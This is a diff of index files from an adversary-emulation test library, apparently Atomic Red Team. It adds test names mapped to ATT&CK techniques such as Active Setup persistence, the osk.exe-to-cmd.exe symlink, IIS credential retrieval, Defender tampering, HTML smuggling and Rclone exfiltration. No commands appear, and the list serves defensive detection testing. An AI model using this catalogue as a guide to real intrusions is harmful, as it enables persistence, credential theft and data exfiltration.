@@ -391,6 +396,7 @@ privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution O
|
||||
privilege-escalation,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
|
||||
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
|
||||
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
|
||||
privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
|
||||
privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
|
||||
privilege-escalation,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
|
||||
privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
|
||||
@@ -424,6 +430,8 @@ privilege-escalation,T1547.001,Boot or Logon Autostart Execution: Registry Run K
|
||||
privilege-escalation,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
|
||||
privilege-escalation,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
|
||||
privilege-escalation,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
|
||||
privilege-escalation,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
|
||||
privilege-escalation,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (With Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
|
||||
privilege-escalation,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
|
||||
privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
|
||||
privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
|
||||
@@ -533,6 +541,9 @@ persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via t
|
||||
persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
|
||||
persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
|
||||
persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
|
||||
persistence,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
|
||||
persistence,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
|
||||
persistence,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
|
||||
persistence,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
|
||||
persistence,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
|
||||
persistence,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
|
||||
@@ -572,6 +583,7 @@ persistence,T1546.012,Event Triggered Execution: Image File Execution Options In
|
||||
persistence,T1546.012,Event Triggered Execution: Image File Execution Options Injection,3,GlobalFlags in Image File Execution Options,13117939-c9b2-4a43-999e-0a543df92f0d,powershell
|
||||
persistence,T1546.008,Event Triggered Execution: Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
|
||||
persistence,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
|
||||
persistence,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
|
||||
persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
|
||||
persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
|
||||
persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
|
||||
@@ -599,6 +611,8 @@ persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-
|
||||
persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
|
||||
persistence,T1098,Account Manipulation,9,Password Change on Directory Service Restore Mode (DSRM) Account,d5b886d9-d1c7-4b6e-a7b0-460041bf2823,command_prompt
|
||||
persistence,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
|
||||
persistence,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
|
||||
persistence,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (With Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
|
||||
persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
|
||||
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
|
||||
persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
|
||||
@@ -679,6 +693,8 @@ credential-access,T1110.001,Brute Force: Password Guessing,6,Password Brute User
|
||||
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
|
||||
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
|
||||
credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
|
||||
credential-access,T1003,OS Credential Dumping,4,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list),6c7a4fd3-5b0b-4b30-a93e-39411b25d889,powershell
|
||||
credential-access,T1003,OS Credential Dumping,5,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config),42510244-5019-48fa-a0e5-66c3b76e6049,powershell
|
||||
credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
|
||||
credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
|
||||
credential-access,T1003.002,OS Credential Dumping: Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt
|
||||
@@ -1020,3 +1036,4 @@ exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over
|
||||
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
|
||||
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
|
||||
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,6,MAZE FTP Upload,57799bc2-ad1e-4130-a793-fb0c385130ba,powershell
|
||||
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,7,Exfiltration Over Alternative Protocol - FTP - Rclone,b854eb97-bf9b-45ab-a1b5-b94e4880c56b,powershell
|
||||
|
||||
|
@@ -465,6 +465,7 @@
|
||||
- Atomic Test #34: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell [windows]
|
||||
- Atomic Test #35: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell [windows]
|
||||
- Atomic Test #36: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature [windows]
|
||||
- Atomic Test #37: WMIC Tamper with Windows Defender Evade Scanning Folder [windows]
|
||||
- T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -562,7 +563,8 @@
|
||||
- T1601.001 Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1146 Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
|
||||
- Atomic Test #1: HTML Smuggling Remote Payload [windows]
|
||||
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
|
||||
@@ -714,7 +716,10 @@
|
||||
- Atomic Test #1: Add a driver [windows]
|
||||
- T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1206 Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
|
||||
- Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
|
||||
- Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
|
||||
- Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
|
||||
- [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
|
||||
- Atomic Test #1: Add Federation to Azure AD [azure-ad]
|
||||
- [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
|
||||
@@ -805,6 +810,7 @@
|
||||
- [T1546.008 Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md)
|
||||
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
|
||||
- Atomic Test #2: Replace binary of sticky keys [windows]
|
||||
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
|
||||
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
|
||||
- Atomic Test #1: Process Injection via C# [windows]
|
||||
@@ -814,6 +820,7 @@
|
||||
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
|
||||
- Atomic Test #1: Persistence by modifying Windows Terminal profile [windows]
|
||||
- Atomic Test #2: Add macOS LoginItem using Applescript [macos]
|
||||
- [T1134.001 Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md)
|
||||
- Atomic Test #1: Named pipe client impersonation [windows]
|
||||
- Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
|
||||
@@ -872,6 +879,8 @@
|
||||
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1546 Event Triggered Execution](../../T1546/T1546.md)
|
||||
- Atomic Test #1: Persistence with Custom AutodialDLL [windows]
|
||||
- Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
|
||||
- Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
|
||||
- [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
|
||||
- Atomic Test #1: Add command to .bash_profile [macos, linux]
|
||||
- Atomic Test #2: Add command to .bashrc [macos, linux]
|
||||
@@ -1142,7 +1151,10 @@
|
||||
- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
|
||||
- Atomic Test #1: Add a driver [windows]
|
||||
- T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
|
||||
- Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
|
||||
- Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
|
||||
- Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
|
||||
- T1180 Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
|
||||
@@ -1253,6 +1265,7 @@
|
||||
- [T1546.008 Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md)
|
||||
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
|
||||
- Atomic Test #2: Replace binary of sticky keys [windows]
|
||||
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
|
||||
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
|
||||
@@ -1268,6 +1281,7 @@
|
||||
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
|
||||
- Atomic Test #1: Persistence by modifying Windows Terminal profile [windows]
|
||||
- Atomic Test #2: Add macOS LoginItem using Applescript [macos]
|
||||
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1098.001 Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md)
|
||||
- Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
|
||||
@@ -1332,6 +1346,8 @@
|
||||
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1546 Event Triggered Execution](../../T1546/T1546.md)
|
||||
- Atomic Test #1: Persistence with Custom AutodialDLL [windows]
|
||||
- Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
|
||||
- Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
|
||||
- [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
|
||||
- Atomic Test #1: Add command to .bash_profile [macos, linux]
|
||||
- Atomic Test #2: Add command to .bashrc [macos, linux]
|
||||
@@ -1589,6 +1605,8 @@
|
||||
- Atomic Test #1: Gsecdump [windows]
|
||||
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
|
||||
- Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
|
||||
- Atomic Test #4: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list) [windows]
|
||||
- Atomic Test #5: Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config) [windows]
|
||||
- T1171 LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
|
||||
- Atomic Test #1: Steal Firefox Cookies (Windows) [windows]
|
||||
@@ -1623,11 +1641,13 @@
|
||||
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1040 Network Sniffing](../../T1040/T1040.md)
|
||||
- Atomic Test #1: Packet Capture Linux [linux]
|
||||
- Atomic Test #2: Packet Capture macOS [macos]
|
||||
- Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
|
||||
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
|
||||
- Atomic Test #4: Windows Internal Packet Capture [windows]
|
||||
- Atomic Test #5: Windows Internal pktmon capture [windows]
|
||||
- Atomic Test #6: Windows Internal pktmon set filter [windows]
|
||||
- Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- [T1552.002 Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md)
|
||||
- Atomic Test #1: Enumeration for Credentials in Registry [windows]
|
||||
- Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
|
||||
@@ -1863,11 +1883,13 @@
|
||||
- Atomic Test #3: System Service Discovery - systemctl [linux]
|
||||
- [T1040 Network Sniffing](../../T1040/T1040.md)
|
||||
- Atomic Test #1: Packet Capture Linux [linux]
|
||||
- Atomic Test #2: Packet Capture macOS [macos]
|
||||
- Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
|
||||
- Atomic Test #3: Packet Capture Windows Command Prompt [windows]
|
||||
- Atomic Test #4: Windows Internal Packet Capture [windows]
|
||||
- Atomic Test #5: Windows Internal pktmon capture [windows]
|
||||
- Atomic Test #6: Windows Internal pktmon set filter [windows]
|
||||
- Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- [T1135 Network Share Discovery](../../T1135/T1135.md)
|
||||
- Atomic Test #1: Network Share Discovery [macos]
|
||||
- Atomic Test #2: Network Share Discovery - linux [linux]
|
||||
@@ -2378,4 +2400,5 @@
|
||||
- Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
|
||||
- Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
|
||||
- Atomic Test #6: MAZE FTP Upload [windows]
|
||||
- Atomic Test #7: Exfiltration Over Alternative Protocol - FTP - Rclone [windows]
|
||||
|
||||
|
||||
@@ -256,7 +256,8 @@
|
||||
- T1136.002 Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1547.015 Boot or Logon Autostart Execution: Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
|
||||
- Atomic Test #2: Add macOS LoginItem using Applescript [macos]
|
||||
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -332,7 +333,8 @@
|
||||
- Atomic Test #1: Make and modify binary from C source [macos, linux]
|
||||
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
|
||||
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
|
||||
- T1547.015 Boot or Logon Autostart Execution: Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1547.015 Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md)
|
||||
- Atomic Test #2: Add macOS LoginItem using Applescript [macos]
|
||||
- T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1546.014 Event Triggered Execution: Emond](../../T1546.014/T1546.014.md)
|
||||
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
|
||||
@@ -382,7 +384,9 @@
|
||||
- T1167 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1040 Network Sniffing](../../T1040/T1040.md)
|
||||
- Atomic Test #2: Packet Capture macOS [macos]
|
||||
- Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
|
||||
- Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1552 Unsecured Credentials](../../T1552/T1552.md)
|
||||
@@ -441,7 +445,9 @@
|
||||
- T1069.002 Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1007 System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1040 Network Sniffing](../../T1040/T1040.md)
|
||||
- Atomic Test #2: Packet Capture macOS [macos]
|
||||
- Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
|
||||
- Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- [T1135 Network Share Discovery](../../T1135/T1135.md)
|
||||
- Atomic Test #1: Network Share Discovery [macos]
|
||||
- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
|
||||
@@ -356,6 +356,7 @@
|
||||
- Atomic Test #34: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell [windows]
|
||||
- Atomic Test #35: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell [windows]
|
||||
- Atomic Test #36: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature [windows]
|
||||
- Atomic Test #37: WMIC Tamper with Windows Defender Evade Scanning Folder [windows]
|
||||
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -424,7 +425,8 @@
|
||||
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1223 Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
|
||||
- Atomic Test #1: HTML Smuggling Remote Payload [windows]
|
||||
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
|
||||
@@ -539,7 +541,10 @@
|
||||
- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
|
||||
- Atomic Test #1: Add a driver [windows]
|
||||
- T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
|
||||
- Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
|
||||
- Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
|
||||
- Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
|
||||
- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
|
||||
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
|
||||
@@ -604,6 +609,7 @@
|
||||
- [T1546.008 Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md)
|
||||
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
|
||||
- Atomic Test #2: Replace binary of sticky keys [windows]
|
||||
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
|
||||
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
|
||||
- Atomic Test #1: Process Injection via C# [windows]
|
||||
@@ -657,6 +663,8 @@
|
||||
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1546 Event Triggered Execution](../../T1546/T1546.md)
|
||||
- Atomic Test #1: Persistence with Custom AutodialDLL [windows]
|
||||
- Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
|
||||
- Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
|
||||
- [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
|
||||
- Atomic Test #1: Injection SID-History with mimikatz [windows]
|
||||
- [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
|
||||
@@ -845,7 +853,10 @@
|
||||
- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
|
||||
- Atomic Test #1: Add a driver [windows]
|
||||
- T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
|
||||
- Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
|
||||
